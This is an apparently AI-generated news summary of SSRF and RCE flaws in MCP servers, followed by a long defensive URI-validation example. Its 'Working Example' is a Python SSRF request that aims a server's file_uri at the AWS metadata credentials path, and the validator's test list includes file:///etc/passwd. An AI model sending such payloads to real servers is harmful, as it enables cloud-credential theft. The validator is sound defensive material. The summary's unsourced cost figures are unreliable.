Microsoft & Anthropic MCP Servers at Risk of RCE, Cloud Takeovers
These articles are AI-generated summaries. Please check the original sources for full details.
MCP Servers Carry SSRF Risks
Popular model context protocol (MCP) servers, essential components of AI services, are vulnerable to serious cybersecurity issues. Researchers revealed exploit chains weaponizing Anthropic’s Git and filesystem MCP servers for remote code execution (RCE) and identified a severe server-side request forgery (SSRF) vulnerability in Microsoft’s MarkItDown MCP server.
The rapid growth of AI and autonomous agents has outpaced security considerations, creating a complex threat landscape. The idealized picture is of AI interactions contained within a sandbox; in reality, LLMs now reach external data sources through MCP servers, often with inadequate security controls, potentially exposing organizations to significant data breaches and unauthorized access, estimated to cost billions annually in remediation and fines.
Key Insights
- SSRF vulnerability in Microsoft MarkItDown MCP server, January 2026: Allows attackers to access internal resources and potentially retrieve cloud credentials.
- MCP servers rely on user input for file locations: this creates an inherent risk of SSRF attacks if the supplied location is not properly validated before the server fetches it.
- Anthropic’s initial MCP design lacked built-in security: Leaving security implementation to the user resulted in widespread vulnerabilities.
Working Example
```python
# Example of a vulnerable request to MarkItDown MCP server
import requests

# Replace with the actual URL of the MarkItDown server
target_url = "http://example.com/convert"

# Payload to trigger SSRF - attempt to access AWS metadata
payload = {
    "file_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"
}

try:
    response = requests.post(target_url, data=payload)
    response.raise_for_status()  # Raise HTTPError for bad responses (4xx or 5xx)
    print(response.text)  # Print the response, potentially containing AWS credentials
except requests.exceptions.RequestException as e:
    print(f"Error: {e}")
```
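The Key Insights above point out that a conversion server fetching a user-supplied file location is inherently exposed to SSRF, and the request above shows the shape of such a request. The following is an added example, written for this page and not code from the article or from the MarkItDown or MCP projects, of the check a server should apply to a `file_uri` before fetching it: refuse non-web schemes, resolve the host, and reject any address in loopback, private or link-local ranges (the 169.254.0.0/16 range contains the cloud metadata address 169.254.169.254), including IPv4-mapped IPv6 forms. The hostnames and the `fake_resolver` table are constructed so the example runs offline; a real deployment would pass the default `socket.getaddrinfo`.

```python
# Added example (not from the article or the MarkItDown project): an allow-list
# URI validator for user-supplied fetch locations. Hostnames and the fake DNS
# table below are constructed for illustration.
from __future__ import annotations

import ipaddress
import socket
from urllib.parse import urlsplit

# Only remote web fetches are allowed; file://, gopher://, ftp:// etc. are refused.
ALLOWED_SCHEMES = {"http", "https"}

# Networks a converter should never fetch from: "this host", loopback, RFC 1918,
# the link-local range that holds the cloud metadata service, and IPv6 equivalents.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),
    ipaddress.ip_network("fe80::/10"),
]


class UnsafeUriError(ValueError):
    """Raised when a user-supplied URI must not be fetched."""


def _is_blocked(ip) -> bool:
    # IPv4-mapped IPv6 addresses (::ffff:169.254.169.254) are checked as IPv4.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_multicast or any(ip in net for net in BLOCKED_NETWORKS)


def validate_fetch_uri(uri: str, resolver=socket.getaddrinfo) -> list[str]:
    """Validate a URI and return the IP addresses it may be fetched from.

    The caller should connect to one of the returned addresses (keeping the
    original Host header) instead of re-resolving the name, so that a DNS
    rebinding flip between check and fetch cannot bypass the check.
    """
    parts = urlsplit(uri)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeUriError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise UnsafeUriError("missing host")
    if parts.username or parts.password:
        raise UnsafeUriError("credentials in URI not allowed")  # user@host confusion
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError as exc:
        raise UnsafeUriError("invalid port") from exc

    host = parts.hostname
    try:  # literal IP addresses are checked directly
        candidates = [ipaddress.ip_address(host)]
    except ValueError:  # otherwise resolve, and every returned address must pass
        try:
            infos = resolver(host, port, proto=socket.IPPROTO_TCP)
        except socket.gaierror as exc:
            raise UnsafeUriError(f"cannot resolve {host!r}") from exc
        candidates = [ipaddress.ip_address(info[4][0]) for info in infos]

    if not candidates:
        raise UnsafeUriError(f"no addresses for {host!r}")
    for ip in candidates:
        if _is_blocked(ip):
            raise UnsafeUriError(f"{host!r} resolves to blocked address {ip}")
    return [str(ip) for ip in candidates]


def is_safe_fetch_uri(uri: str, resolver=socket.getaddrinfo) -> bool:
    """Boolean convenience wrapper around validate_fetch_uri()."""
    try:
        validate_fetch_uri(uri, resolver)
        return True
    except UnsafeUriError:
        return False


# Constructed DNS table so the example runs offline and deterministically.
FAKE_DNS = {
    "docs.example.com": ["203.0.113.10"],
    "rebind-test.example": ["169.254.169.254"],        # name that points at metadata
    "dual.example.com": ["203.0.113.11", "10.0.0.5"],  # one public, one private answer
}


def fake_resolver(host, port, proto=0):
    """getaddrinfo-shaped stand-in backed by FAKE_DNS (constructed)."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"unknown host {host}")
    return [(None, None, None, None, (ip, port)) for ip in FAKE_DNS[host]]


if __name__ == "__main__":
    for candidate in [
        "https://docs.example.com/report.pdf",
        "http://169.254.169.254/latest/meta-data/",
        "http://rebind-test.example/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "file:///etc/passwd",
        "http://dual.example.com/x",
    ]:
        print(f"{candidate:55} -> safe={is_safe_fetch_uri(candidate, fake_resolver)}")
```

The returned address list matters: validating the name and then letting an HTTP client resolve it again leaves a window for DNS rebinding, so the fetch should go to the vetted address. A redirect from an allowed host to a blocked one needs the same check on every hop, which means disabling automatic redirects in the HTTP client and re-validating each `Location`.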
Practical Applications
- Financial Institutions: MCP servers used for AI-powered customer service could be exploited to access sensitive customer data.
- Pitfall: Relying on open-source components without thorough security audits can introduce vulnerabilities like the SSRF issue in MarkItDown.